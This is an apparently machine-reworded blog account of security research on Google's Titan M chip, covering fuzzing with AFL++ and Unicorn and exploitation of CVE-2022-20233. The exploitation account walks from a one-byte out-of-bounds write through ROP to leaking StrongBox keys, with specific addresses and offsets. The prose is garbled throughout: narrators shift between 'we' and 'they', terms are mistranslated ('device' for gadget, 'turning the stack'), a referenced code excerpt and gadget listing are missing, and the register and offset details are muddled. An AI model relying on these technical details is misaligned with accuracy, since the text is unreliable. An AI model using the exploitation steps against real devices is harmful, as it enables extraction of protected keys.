Introduction

Titan M, a security chip included by Google in its Pixel smartphones starting with the Pixel 3, was examined over the course of the previous 18 months by Mr. Damiano Melotti, Mr. Maxime Rossi Bellom, and Mr. Philippe Teuwen. They presented the findings at Black Hat EU 2021, among other venues, along with a whitepaper that summarised all the background information learned during the initial round of this investigation. They are currently delving into the most recent firmware vulnerability discovered for the device, CVE-2022-20233. Let’s talk first about a vulnerability that was found using AFL++ in Unicorn mode and emulation-based fuzzing. Then came the exploitation with all of its difficulties, which eventually enabled code execution on the chip.

Background

Google released the Titan M in its Pixel devices in 2018. The main objective was to mitigate hardware tampering and side-channel assaults by reducing the attack surface that was open to attackers. It is true that the chip, which is part of a different system-on-a-chip (SoC) in the gadget, has its own firmware and interacts with the Application Processor (AP) over the SPI bus. The implementation of a number of APIs ensures a greater level of security for the smartphone’s most security-sensitive features, such as a secure boot or a hardware-backed Keystore with StrongBox.

Reverse engineering the Titan M firmware, which is based on Embedded Controller (EC), a compact open-source OS for micro-controllers, was the primary goal of the initial stages of this project. This OS has a set stack size and no heap, and it is designed around the idea of tasks (so no complex dynamic allocation). The Titan M chip has essentially a static memory layout, which assumes some objects will always be located at the same location. This is a crucial element that will be valuable in the future.

Security benefits from the OS’s simplicity include the total eradication of some issues related to dynamic allocation’s temporal memory safety. Additionally, the chip’s memory is set up so that no region can have both Write and eXecute permissions granted to it at the same time thanks to its Memory Protection Unit (MPU). By doing some signature checks before loading the firmware, a secure boot is implemented. Despite these characteristics, the chip does not contain any standard exploit mitigation measures, with the exception of a hardcoded stack canary that is added to the end of each task stack to identify mistakes. As a result, Titan M is fairly vulnerable to memory corruption flaws, thus we decided to investigate how to fuzz it and seek for potential.

Fuzzing Titan M

Fuzzing is a well-known method for finding memory corruption problems in code bases created in risky languages like C. Without having access to the sources and with a lot of hardware-dependent code, it can be difficult to fuzze a security chip. We chose to investigate the black-box and emulation-based fuzzing strategies.

Black-box fuzzing

To better grasp the distinctions between Black-box fuzzing and the other methods, let’s take a quick look at it. Black-box fuzzing of targets like Titan M may typically be relatively straightforward: all that is required is a channel to communicate with the target during testing and a mechanism to determine whether it crashes or enters unexpected states. In this instance, earlier stages of the research had led to the development of nosclient, a unique client that runs natively on Android and talks directly with the kernel driver in charge of the chip’s communication. We were able to communicate with Titan M thanks to the ability to send arbitrary messages, and the signal to deduce what transpired during their processing came in the form of the return code from the library methods we utilised.

Protobuf is used to serialize messages in the majority of jobs that interact with Android. Therefore, we might use libprotobuf-mutator to mutate these messages using this grammar, which is available due to the open-source definitions in the AOSP. To create our test cases for Nugget, one of the tasks that do not use Protobuf, we used the enduring Radamsa.

This method did produce some intriguing outcomes that, in terms of fuzzing, can be expressed as bugs. While fuzzing an older version of the firmware, we discovered several issues we previously knew about, including the buffer overflow we had successfully exploited in our previous study. Additionally, even though all crashes were brought on by the same null pointer dereference, we found two additional crashes in the most recent firmware version at the time that was not deemed critical enough to merit inclusion in an Android Security Bulletin.

Emulation-based fuzzing

They concentrated on an alternate strategy called emulation-based fuzzing. Using our basic understanding of how it functions gained from hours of reverse engineering, we set up an emulation framework to run the firmware line-by-line and examine its behavior. A coverage-guided fuzzer can prioritize inputs leading to new instructions being accessed and modify its mutator as a result of this excellent feedback.

There are other methods to create a solution like this, but we ultimately chose to use the AFL++ fuzzing framework and the Unicorn emulation engine. The QEMU-based project Unicorn only provides CPU emulation; it does not emulate the entire system. Since their scripts are quite simple and incorporate some ad-hoc adjustments to better the detection of faults or get around specific problems, this was a benefit in our instance rather than a constraint. Due to its unicorn mode, which essentially enables to fuzz pretty much anything that can be emulated with Unicorn, Unicorn also works quite well with AFL++. The definition of the place input callback function, which records inputs in the target’s memory after each contact, is the only step needed.

They tested additional Titan M firmware features while keeping in mind plausible attack scenarios. However, after running a few fuzzing campaigns around the SPI rescue function without producing any notable results, they made the decision to refocus on the tasks and recreate an experiment done in a black-box environment. Since AFL++ supports custom mutators, we plugged in libprotobuf-mutator once more and individually emulated the Keymaster, Identity, and Weaver tasks of the firmware. Due to the little attack surface that AVB exposes—the majority of interactions take place while the device is in bootloader mode—we chose to ignore it.

Thankfully, there is one problem that stands out and brings up the limitations of emulation-based fuzzing. There is no such thing as a free lunch, as we all know, and this strategy has certain disadvantages as well.

Multiple hardware-dependent functions make it difficult to readily simulate certain parts of the code, making it necessary to hook them and inevitably reducing the testing coverage.

Despite improvements, the plain black-box approach still only detects issues that result in Unicorn errors, leaving out a variety of in-page overflows, off-by-ones, etc.

Lack of complete system emulation: This decision alone has the problem of neglecting some routines, which ultimately results in failing to catch some bugs. They were unable to re-identify the previously reported vulnerability as a result of this.

To address the second issue, Unicorn enables the setting of a variety of custom hooks to track certain memory accesses or blocks of code. They implement various heuristics to identify certain bug patterns, such as broken memcpy calls that resulted in reading from the Boot ROM (that is mapped at address 0x0). However, there is a trade-off between the time spent reverse engineering to find these patterns and the time you actually let the fuzzer run freely because hooks affect performance.

The vulnerability

But let’s get to the delicious part now. They came upon an intriguing crash while fuzz testing the Keymaster task, which was brought on by a UC ERR WRITE UNMAPPED while handling an ImportKey request. The firmware was attempting to write 1 byte into an unmapped memory region at the time of the crash, which happened during an strb instruction. Note that the Google Pixel security update from May 2022 introduced the vulnerable software.

ImportKey messages include a KeyParameters field, which is composed of one or more KeyParameter objects, just like the Protobuf definitions. The vulnerability occurs when a vulnerable function goes through the list of parameters and checks each one to see if the tag is 0x20005, which stands for DIGEST. After performing several tests, the function utilizes the corresponding integer field as an offset of a stack buffer to set a byte to 1 when such parameters are detected. It is feasible to write the one-byte value of 0x01 outside of limits by providing a large enough integer as a parameter.

The code excerpt below illustrates these checks as well as the strb instruction that caused the out-of-bounds write and consequent crash, both in assembly and decompiled view. At that point, the buffer address is r7, the current KeyParameter’s integer field is r3, and r1 is set to 0x1.

With the exception of staying within the maximum size of the KeyParameters list, the vulnerability can actually be exploited as many times as the number of parameters with a DIGEST tag. Multiple 1-byte out-of-bounds writings are the outcome. Due to the offset checks, however, such writings are far from random. The least significant byte can only be 0x0, 0x2, or 0x4 without getting into the specifics of bit-wise operations.

This problem may appear to be extremely trivial and rarely exploitable at this moment. Remember, though, as we said previously, that Titan M’s memory is entirely static. Considering the many messages that have a KeyParameters field, the problem can also be accessed via various code pathways. Setting a single byte to 1 can be used for a variety of purposes, ranging from a straightforward DoS to changing a size variable someplace in memory and causing corruption elsewhere, provided that we can write at the proper location.

Exploitation

They then created a little script to create and highlight all Ghidra’s potential writeable addresses. then began looking for intriguing targets, and it turned out that exploiting the flaw just once was sufficient to compromise the chip.

What to overwrite

They discovered during testing that r1 may contain the vulnerable code, which is 0x14019. This might be offset by 0xa204 to get to 0x1e21d (notice that the least significant byte allows passing the checks). This address is a component of the KEYMASTER SPI DATA structure, which contains details regarding the transmission of Keymaster messages to Android. The memory location referring to where incoming requests for the Keymaster task are placed is by default 0x192c8, but if written 0x1 to 0x1e21d, the value becomes 0x101c8. This is where they could specifically overwrite one byte. As a result, the Titan M would suffer terrible consequences and the upcoming Keymaster requests would be kept fairly far from where they should be.

The UART console

Let’s rehearse how to interface with the chip for a moment before trying to exploit this weakness. Our nosclient, which enables us to spoof any communication and send it straight to the driver, is the only tool we employ. Titan M responds to a request by returning a return code and a response that, in the event of an error, is empty. With only this information at hand, creating an exploit is extremely difficult because it lacks access to debugging tools and cannot examine stack traces or the immediate repercussions of an assault.

The UART console exposed by the microcontroller comes in quite handy at this point. There are two ways to get there, and each one has its own set of difficulties. The first method utilizes a unique debugging cable known as SuzyQable. Since Titan M is built on the same operating system, it turns out that this cable, which is officially referred to as the cable to debug Chrome OS microcontrollers, also works with Titan M. They must boot the Pixel smartphone into fastboot mode and enter the command fastboot OEM citadel suzyq on to activate it. When utilizing the SuzyQable to connect the device, we can then use our laptop’s interface to access the UART console.

The cable concurrently enables adb communication with the device. Unfortunately, the channel is closed and the interface needs to be opened once more in order to return to fastboot mode when the chip crashes or even after a reboot command is delivered over this console. Because of how impracticable this is, we took the alternate route.

The MacGyver solution can be viewed as the second option. The Titan M exposes the UART pins on the motherboard, necessitating the soldering of two wires in order to produce a shell identical to the one obtained with the cable. In this instance, no matter what happens to the gadget or the chip, the console never shuts down and remains operational.

Titan M chip

The Titan M console is very simple and enables quick interactions with the chip to look up statistics, versions, and related information. However, it is most significant because that is where debugging logs are printed. In fact, going back to exploit development, it is clear that this doesn’t tell us anything about what went wrong when something didn’t work, but it’s still very helpful: for instance, we could always try to jump to a function that prints something and see if our exploit is functioning properly up until that point.

Hijacking execution flow

As we previously mentioned, we modified the address where incoming Keymaster requests were kept as a result of the out-of-bounds writing. Since this region is still in the chip’s memory, any incoming messages would overwrite any existing data there. Due to this, we experimented with sending increasingly massive commands while keeping an eye on the UART logs. After some experimentation, they discovered that by inserting a legal code address 556 bytes after the payload, they could leap to it and essentially divert execution to a function of their choosing. Some logs that were printed in the UART terminal allowed us to notice that.

UART terminal

This area of memory was being accessed by certain activities, which were most likely inactive, and may have caused a return address to be placed on its stack and then overwritten. They then jumped to a random function at this point. How can that be turned into a real exploit?

Return Oriented Programming

Because writable memory is not executable, they are unable to create their own shellcode and jump to it due to the memory safeguards in place. Instead, utilize a code-reuse attack and a Return Oriented Programming-based vulnerability. The goal was to create a read-anywhere primitive such that, using a specially designed command from nosclient, they could reveal the information Titan M is guarding.

Unfortunately, because it would damage some memory and cause the chip to crash before our exploit was finished, they did not write our ROP chain exactly where our initial device was written. Therefore, turning the stack was the first difficult task. The stack should be heading towards larger addresses, thus we wanted to reduce the stack pointer as much as possible. Instead, we wanted to rely on the payload we could fit inside those 556 bytes, which could be set whatever they pleased without having any negative effects. They only discovered one device that could do it, but it also has several additional functions:

Even though we created an ROP chain that would call it repeatedly, made sure r0 was pointing to a memory location we also managed, and created a few tools to let the ldr and blx instructions operate as they saw fit.

Impact

They now have the ability to read any memory on the chip because of the leaking functionality that was created with this attack. They now have access to any address that can be read. Dumping the secrets from the chip as a result (such as the Root of Trust sent by the Pixel bootloader when Titan M is updated). Additionally, they had access to the Boot ROM, which they had not had before. This is doable despite the chip’s slightly modified memcpy, which checks to see if the src or dst buffers equal 0x0. In reality, avoiding those checks and going straight to the basic block, where the copying takes place, is preferable to jumping straight to the function’s entry point.

One of the most intriguing effects of this attack is the ability to recover any StrongBox-protected key, circumventing the Android Keystore’s highest degree of security. These keys are kept on the device in an encrypted key blob, much like in TrustZone, but they can only be used inside Titan M.

The procedure is the following:

  • read a key blob from the Android OS (from any application);
  • send a valid, well-formed BeginOperation request, containing such a key blob:
    • the handler for this command decrypts the key and stores it into a specific memory address. This prepares the chip to perform the requested operation;
  • run the exploit and leak the memory where the plaintext key is now stored.

They also created a mock application that does nothing more than generate an AES key that is secured by StrongBox and encrypts a string in order to show how effective this attack is. By utilizing the same initialization vector and their hack, they can now successfully leak the appropriate key from the Titan M and successfully decrypt the string offline (or rather “off the phone”).

Reminder: There are two prerequisites for carrying off this attack. First, you should be able to physically access the SPI bus or use a rooted device to transmit commands to the chip (nosclient requires this).

Once again, being root or using an exploit to get around File Based Encryption or the uid access restriction can be used to gain access to the key blobs on the Android file system.

Mitigations

They informed Google of this issue, and of course, the patch included in the June security advisory is the best way to mitigate it. They did, however, want to draw attention to a unique feature that might have prevented the StrongBox key blob leak. Indeed, an application can create a key that is authentication-bound, specifying setUserAuthenticationRequired(true) when building it with KeyGenParameterSpec. Users must authenticate before using the key in this way, and the key blob is encrypted a second time using a unique key that is obtained from the user password that we do not know.

Conclusion

The Titan M chip is the most secure part of Google’s Pixel phones and the point of connection for all of the system security. Despite excellent design choices, several attempts to reduce its attack surface, making it very difficult to exploit flaws, and the lack of suitable tools to debug the chip, in our project we were able to:

  • Reverse engineer the communications between Android and the chip.
  • Develop nosclient, an open-source tool that lets a researcher send arbitrary commands to the chip.
  • Discover vulnerabilities using black-box fuzzing.
  • Emulate the chip and discover a vulnerability using emulation-based fuzzing.
  • Leverage some implementation weaknesses and exploit the vulnerability to achieve code execution on the chip and exfiltrate sensitive data (cryptographic keys) that should never leave it.

The vulnerability was reported to Google in May 2022 and a fix was released in the Pixel Security update of June 2022.